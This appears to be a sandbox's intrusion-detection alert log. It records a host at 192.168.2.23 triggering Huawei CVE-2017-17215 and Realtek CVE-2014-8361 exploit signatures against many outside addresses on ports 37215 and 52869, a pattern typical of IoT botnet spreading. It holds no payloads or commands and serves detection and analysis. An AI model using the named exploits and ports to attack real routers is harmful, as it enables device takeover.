                                      07/20/24-23:01:11.816521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256637215192.168.2.23197.88.172.221
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433637215192.168.2.23158.210.184.146
                                      07/20/24-23:01:08.600679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24532852869192.168.2.23223.83.213.222
                                      07/20/24-23:01:14.105395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128637215192.168.2.23197.216.251.19
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721837215192.168.2.23197.71.69.91
                                      07/20/24-23:01:41.930505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3921252869192.168.2.23160.67.56.20
                                      07/20/24-23:01:20.175900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612237215192.168.2.23197.188.204.57
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991637215192.168.2.23157.129.228.162
                                      07/20/24-23:01:02.509396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318252869192.168.2.23187.26.13.206
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616437215192.168.2.23197.47.55.117
                                      07/20/24-23:01:41.747994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4827052869192.168.2.2371.169.30.84
                                      07/20/24-23:02:27.457367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5915452869192.168.2.23157.69.166.230
                                      07/20/24-23:01:03.432937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615860252869192.168.2.23140.186.145.164
                                      07/20/24-23:01:08.600114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25899252869192.168.2.23113.34.69.120
                                      07/20/24-23:01:44.814790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6023652869192.168.2.2363.140.14.0
                                      07/20/24-23:01:20.140632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362037215192.168.2.2318.226.20.52
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988637215192.168.2.23157.178.189.119
                                      07/20/24-23:01:12.841280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4342852869192.168.2.232.221.152.25
                                      07/20/24-23:01:46.113314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3465252869192.168.2.2378.241.170.132
                                      07/20/24-23:01:46.387777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4417652869192.168.2.23137.85.104.5
                                      07/20/24-23:01:10.603142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5356252869192.168.2.2335.68.164.37
                                      07/20/24-23:01:01.629050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613713452869192.168.2.23129.167.170.254
                                      07/20/24-23:01:51.124824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613531052869192.168.2.23208.210.235.23
                                      07/20/24-23:01:47.377081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3499452869192.168.2.23207.27.209.75
                                      07/20/24-23:01:49.825670TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3660852869192.168.2.2349.79.18.186
                                      07/20/24-23:01:31.976649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600237215192.168.2.23137.158.184.177
                                      07/20/24-23:01:42.662837TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24273052869192.168.2.2351.186.28.39
                                      07/20/24-23:01:08.575986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5978452869192.168.2.2370.59.242.166
                                      07/20/24-23:01:11.817771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851637215192.168.2.23130.210.124.219
                                      07/20/24-23:01:44.007374TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613601052869192.168.2.234.9.166.109
                                      07/20/24-23:01:47.798104TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615225252869192.168.2.2313.59.59.107
                                      07/20/24-23:01:32.060731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952237215192.168.2.23131.252.149.74
                                      07/20/24-23:01:41.912337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616020652869192.168.2.2377.135.26.34
                                      07/20/24-23:01:14.207040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840837215192.168.2.23197.146.3.86
                                      07/20/24-23:01:57.360180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614811252869192.168.2.23220.91.249.28
                                      07/20/24-23:01:42.704900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618052869192.168.2.23191.59.254.237
                                      07/20/24-23:01:12.806839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3588852869192.168.2.2360.92.43.190
                                      07/20/24-23:01:46.450129TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24868252869192.168.2.2338.183.196.72
                                      07/20/24-23:01:20.157619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.23157.143.93.40
                                      07/20/24-23:01:42.072139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614271052869192.168.2.23113.10.123.41
                                      07/20/24-23:01:44.890268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614579052869192.168.2.23110.45.133.89
                                      07/20/24-23:01:06.990535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794037215192.168.2.23157.64.21.239
                                      07/20/24-23:01:24.813625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5116052869192.168.2.2390.135.90.32
                                      07/20/24-23:01:42.908066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3759852869192.168.2.2398.171.161.225
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040637215192.168.2.23157.51.198.43
                                      07/20/24-23:01:32.032492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194037215192.168.2.23197.101.2.117
                                      07/20/24-23:01:42.869521TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4775052869192.168.2.2370.133.231.223
                                      07/20/24-23:01:43.062246TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615470452869192.168.2.23142.238.177.84
                                      07/20/24-23:01:11.822392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164237215192.168.2.23197.153.22.137
                                      07/20/24-23:01:41.383579TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614346852869192.168.2.23126.224.156.29
                                      07/20/24-23:01:55.623247TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25453852869192.168.2.23207.198.69.39
                                      07/20/24-23:01:42.677301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615598652869192.168.2.2342.61.115.2
                                      07/20/24-23:01:02.750140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032652869192.168.2.232.32.130.76
                                      07/20/24-23:02:07.401340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4709052869192.168.2.2347.224.141.66
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499237215192.168.2.2341.134.147.250
                                      07/20/24-23:01:53.735607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5064052869192.168.2.23107.61.249.135
                                      07/20/24-23:01:42.111275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614397452869192.168.2.23125.78.0.230
                                      07/20/24-23:00:57.221141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.23157.119.223.145
                                      07/20/24-23:01:45.159648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5363852869192.168.2.23147.169.170.137
                                      07/20/24-23:01:07.061779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932437215192.168.2.23136.131.38.133
                                      07/20/24-23:01:44.464382TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616082452869192.168.2.2389.81.144.22
                                      07/20/24-23:01:07.018425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010037215192.168.2.23197.65.5.53
                                      07/20/24-23:01:52.425638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4059452869192.168.2.23171.195.37.248
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940837215192.168.2.23197.35.38.63
                                      07/20/24-23:01:34.055714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649237215192.168.2.2341.168.246.30
                                      07/20/24-23:01:42.939519TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615047452869192.168.2.2370.191.15.111
                                      07/20/24-23:01:43.360543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5451852869192.168.2.2399.181.48.189
                                      07/20/24-23:01:53.524729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4960852869192.168.2.23162.122.16.215
                                      07/20/24-23:01:31.975107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383237215192.168.2.23197.180.219.211
                                      07/20/24-23:01:31.312894TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5334452869192.168.2.2334.158.218.166
                                      07/20/24-23:02:10.031806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906052869192.168.2.2363.25.37.64
                                      07/20/24-23:01:04.782707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5643652869192.168.2.23139.21.143.158
                                      07/20/24-23:01:20.113254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034037215192.168.2.2341.147.128.195
                                      07/20/24-23:01:27.650037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874637215192.168.2.2341.203.181.85
                                      07/20/24-23:01:31.322217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3999852869192.168.2.23146.105.181.156
                                      07/20/24-23:01:47.532849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4041052869192.168.2.2343.128.21.230
                                      07/20/24-23:01:51.197215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615998252869192.168.2.23216.19.121.71
                                      07/20/24-23:01:59.604768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4808652869192.168.2.2393.56.206.158
                                      07/20/24-23:01:51.172994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987252869192.168.2.23200.203.33.61
                                      07/20/24-23:01:45.723019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189052869192.168.2.23201.140.184.210
                                      07/20/24-23:01:08.588009TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25992452869192.168.2.23104.178.230.186
                                      07/20/24-23:01:43.158920TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615206652869192.168.2.23200.248.84.13
                                      07/20/24-23:01:59.539512TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592452869192.168.2.23223.130.78.45
                                      07/20/24-23:01:41.321505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4949252869192.168.2.23198.228.131.204
                                      07/20/24-23:01:51.067695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5073052869192.168.2.23162.125.127.147
                                      07/20/24-23:02:08.128674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614679052869192.168.2.23107.35.253.244
                                      07/20/24-23:01:44.118192TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312852869192.168.2.2367.14.83.223
                                      07/20/24-23:02:05.590034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4140852869192.168.2.23140.127.134.199
                                      07/20/24-23:01:41.245523TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615840852869192.168.2.23207.56.45.233
                                      07/20/24-23:01:26.120876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538452869192.168.2.23143.157.68.18
                                      07/20/24-23:01:49.138222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3870452869192.168.2.23159.143.86.166
                                      07/20/24-23:01:31.312311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3958252869192.168.2.23184.74.79.160
                                      07/20/24-23:01:44.280820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5268652869192.168.2.23182.81.116.37
                                      07/20/24-23:01:40.294677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260237215192.168.2.2341.48.176.220
                                      07/20/24-23:01:41.897768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614519852869192.168.2.23205.156.124.10
                                      07/20/24-23:01:42.290838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5289652869192.168.2.2383.99.82.220
                                      07/20/24-23:00:57.221365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288837215192.168.2.2341.210.186.227
                                      07/20/24-23:01:58.146169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403652869192.168.2.23134.217.248.188
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676437215192.168.2.23197.247.217.62
                                      07/20/24-23:01:02.047411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278437215192.168.2.2383.22.51.58
                                      07/20/24-23:01:31.312186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898652869192.168.2.2361.127.88.100
                                      07/20/24-23:01:45.270636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5577452869192.168.2.2331.234.118.120
                                      07/20/24-23:01:31.328066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4983452869192.168.2.23116.88.149.60
                                      07/20/24-23:01:44.085493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614897452869192.168.2.23116.148.59.65
                                      07/20/24-23:01:50.794251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5009452869192.168.2.2387.83.8.136
                                      07/20/24-23:00:57.221735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768437215192.168.2.2341.214.148.214
                                      07/20/24-23:01:04.118166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578237215192.168.2.23185.92.40.236
                                      07/20/24-23:01:08.599362TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25040052869192.168.2.2371.113.201.241
                                      07/20/24-23:01:34.053062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425837215192.168.2.23197.91.197.8
                                      07/20/24-23:01:46.520662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613695852869192.168.2.2337.115.2.79
                                      07/20/24-23:01:41.722161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614348652869192.168.2.2391.196.45.114
                                      07/20/24-23:01:25.589558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463037215192.168.2.23197.200.133.254
                                      07/20/24-23:01:41.303669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4197852869192.168.2.23184.207.38.235
                                      07/20/24-23:01:52.686542TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23526252869192.168.2.2395.85.24.175
                                      07/20/24-23:01:31.975513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701237215192.168.2.23170.28.87.249
                                      07/20/24-23:01:46.620479TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613968452869192.168.2.2323.141.254.89
                                      07/20/24-23:01:50.202477TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615277852869192.168.2.23192.56.35.207
                                      07/20/24-23:01:43.825430TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614171252869192.168.2.23101.42.79.184
                                      07/20/24-23:01:58.885082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23846052869192.168.2.23130.218.184.181
                                      07/20/24-23:01:49.660516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5104852869192.168.2.23133.169.65.78
                                      07/20/24-23:01:53.057359TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23855852869192.168.2.2342.29.184.117
                                      07/20/24-23:01:45.500697TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5995052869192.168.2.2388.49.181.78
                                      07/20/24-23:01:08.634900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5507252869192.168.2.23123.42.160.177
                                      07/20/24-23:01:11.817297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346837215192.168.2.23157.114.226.119
                                      07/20/24-23:00:59.148145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344037215192.168.2.23157.5.83.65
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425837215192.168.2.23175.51.152.50
                                      07/20/24-23:01:42.145997TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616047652869192.168.2.23177.64.16.178
                                      07/20/24-23:01:52.094111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4835652869192.168.2.23107.137.22.219
                                      07/20/24-23:01:01.320095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3439852869192.168.2.2327.254.228.216
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460837215192.168.2.23157.28.100.8
                                      07/20/24-23:01:25.980169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4783452869192.168.2.23157.217.190.133
                                      07/20/24-23:00:57.222009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651237215192.168.2.23157.21.67.49
                                      07/20/24-23:01:41.276434TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615475652869192.168.2.2386.130.161.177
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658837215192.168.2.23189.208.63.195
                                      07/20/24-23:01:41.360320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4779652869192.168.2.2398.9.1.207
                                      07/20/24-23:01:54.569234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5459652869192.168.2.23206.56.63.93
                                      07/20/24-23:01:42.145997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479652869192.168.2.2382.91.121.224
                                      07/20/24-23:01:44.250892TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616094852869192.168.2.23137.66.212.197
                                      07/20/24-23:01:10.711138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4223252869192.168.2.23181.43.61.4
                                      07/20/24-23:01:51.258596TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23607252869192.168.2.23199.106.155.17
                                      07/20/24-23:01:57.049485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23952252869192.168.2.23135.128.96.121
                                      07/20/24-23:01:13.730392TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615254852869192.168.2.23118.135.71.210
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987437215192.168.2.23157.209.58.117
                                      07/20/24-23:01:49.803911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5884652869192.168.2.2324.200.205.123
                                      07/20/24-23:01:20.110860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773837215192.168.2.2341.233.17.165
                                      07/20/24-23:01:53.844694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5109052869192.168.2.23112.42.28.225
                                      07/20/24-23:01:40.307219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601637215192.168.2.23193.159.96.215
                                      07/20/24-23:01:43.147289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778252869192.168.2.23158.240.85.125
                                      07/20/24-23:02:09.148759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6041252869192.168.2.23189.55.165.96
                                      07/20/24-23:01:00.634292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186437215192.168.2.2341.229.84.234
                                      07/20/24-23:02:06.680685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5401852869192.168.2.2389.86.75.249
                                      07/20/24-23:01:49.794519TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25097052869192.168.2.23200.250.178.79
                                      07/20/24-23:01:56.013827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615788252869192.168.2.23114.121.50.137
                                      07/20/24-23:01:41.508271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6068052869192.168.2.23192.59.76.250
                                      07/20/24-23:01:54.901420TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25326852869192.168.2.23135.69.136.147
                                      07/20/24-23:01:57.512168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613810452869192.168.2.2314.187.245.173
                                      07/20/24-23:01:08.655109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4442852869192.168.2.23155.22.90.90
                                      07/20/24-23:01:42.520139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613625452869192.168.2.23222.217.185.57
                                      07/20/24-23:01:56.315740TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25812652869192.168.2.2319.194.171.63
                                      07/20/24-23:01:14.105908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388437215192.168.2.23157.223.215.224
                                      07/20/24-23:02:00.538390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5326252869192.168.2.23103.238.68.11
                                      07/20/24-23:01:20.591862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5699452869192.168.2.23213.215.4.32
                                      07/20/24-23:01:58.719313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615842452869192.168.2.23159.133.17.143
                                      07/20/24-23:01:34.044152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467837215192.168.2.23157.233.70.28
                                      07/20/24-23:01:49.454456TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615689852869192.168.2.2319.194.171.63
                                      07/20/24-23:01:08.571946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5434052869192.168.2.23105.234.100.63
                                      07/20/24-23:01:40.294677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390437215192.168.2.23197.252.182.107
                                      07/20/24-23:02:12.193882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4100652869192.168.2.23197.114.179.188
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504237215192.168.2.23197.31.86.74
                                      07/20/24-23:01:00.633810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000237215192.168.2.23157.59.116.210
                                      07/20/24-23:01:59.938491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4608652869192.168.2.23128.36.26.52
                                      07/20/24-23:01:41.259813TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614632052869192.168.2.23130.201.79.70
                                      07/20/24-23:01:42.551511TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23358052869192.168.2.2342.245.92.167
                                      07/20/24-23:01:56.504220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614502652869192.168.2.23189.167.254.123
                                      07/20/24-23:01:25.300817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5265852869192.168.2.23220.0.122.40
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085037215192.168.2.23157.7.143.99
                                      07/20/24-23:01:24.882291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.23157.30.21.28
